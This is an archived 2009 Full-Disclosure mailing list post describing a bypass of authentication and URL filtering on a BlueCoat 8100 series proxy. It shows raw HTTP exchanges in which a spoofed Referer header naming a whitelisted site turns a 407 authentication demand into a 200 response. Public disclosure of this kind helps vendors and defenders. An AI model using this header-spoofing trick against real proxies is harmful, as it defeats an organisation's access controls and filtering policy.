lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Fri, 14 Aug 2009 06:10:12 -0700 (PDT)
From: "antoine@...to.fr" <antoine@...to.fr>
To: full-disclosure@...ts.grok.org.uk
Subject: ByPass a BlueCoat Proxy 8100 Serie
	authentification

Title  : ByPass a BlueCoat Proxy 8100 Serie (authentification request AND eventually the 3rd party url filtering solution)
Date   : 14/08/2009
Author : Antoine Santo

******************************************************************
Test one : Try to browse http://www.fcnantes.com/
Result   : I need an Account
******************************************************************
GET http://www.fcnantes.com/ HTTP/1.1
Host: www.fcnantes.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive

     -----------------

HTTP/1.1 407 Proxy Authentication Required
Proxy-Authenticate: BASIC realm="ACCES"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Proxy-Connection: close
Set-Cookie: BCSI-CS-XXX0302B32A48XXX=2; Path=/
Connection: close
Content-Length: 733

<HTML><HEAD>
<TITLE>Authentification needed</TITLE>
</HEAD><BODY></BODY></HTML>

******************************************************************************************
Test two : i just add a spoofed http header REFERER to a whitelisted (localdatabase) site
Result   : W00t !!
******************************************************************************************
GET http://www.fcnantes.com/ HTTP/1.1
Host: www.fcnantes.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Cookie: BCSI-CS-XXX0302B32A48XXX=2
Referer: http://www.mappy.fr

     -----------------

HTTP/1.1 200 OK
Date: Fri, 14 Aug 2009 12:41:44 GMT
Server: Apache/2.2.3 (Debian)
Content-Type: text/html
Transfer-Encoding: chunked
Proxy-Connection: Keep-Alive
Connection: Keep-Alive
Age: 0

133f

<HTML>
<HEAD>
<TITLE>fcnantes.com - Site officiel du FC Nantes</TITLE>
<meta name="description" content="Actualit. du Footbal
<....snip....>
</HTML>

***************************************************************************************************
By the way, http://www.fcnantes.com/ is not even allowed by the url filter with my legal account ;)
***************************************************************************************************


      

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ